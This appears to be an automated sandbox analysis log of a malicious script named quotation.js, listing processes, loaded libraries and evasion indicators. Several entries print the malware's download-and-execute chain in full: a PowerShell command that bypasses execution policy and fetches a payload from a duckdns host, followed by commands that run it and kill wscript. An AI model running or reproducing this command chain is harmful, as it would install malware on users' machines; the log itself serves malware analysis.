Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\Update.php"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im wscript.exe
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tempScript.bat" "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\Update.php"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im wscript.exeJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winhttpcom.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: quotation.jsStatic file information: File size 3316916 > 1048576
Source: Binary string: \mscorlib.pdb[ source: powershell.exe, 0000000A.00000002.1785333273.00000234C1C51000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.1785472340.00000234C1D60000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.1785472340.00000234C1D60000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.1785472340.00000234C1D60000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbviceG source: powershell.exe, 0000000A.00000002.1784746433.00000234C1B8A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Target.pdbon.resources] source: powershell.exe, 0000000A.00000002.1785472340.00000234C1D60000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' "Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFAAC1500AD pushad ; iretd 10_2_00007FFAAC1500C1
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFAAC154D9C rdtsc 10_2_00007FFAAC154D9C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4560Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5295Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7184Thread sleep count: 4560 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7188Thread sleep count: 5295 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7256Thread sleep time: -11990383647911201s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7344Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: wscript.exe, 00000001.00000002.1792296152.00000274B409D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1792296152.00000274B3FF9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: powershell.exe, 0000000A.00000002.1785472340.00000234C1D60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFAAC154D9C rdtsc 10_2_00007FFAAC154D9C

HIPS / PFW / Operating System Protection Evasion

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exeNetwork Connect: 104.26.3.16 443Jump to behavior
Bypasses PowerShell execution policy
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' "
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tempScript.bat" "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\Update.php"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im wscript.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im wscript.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
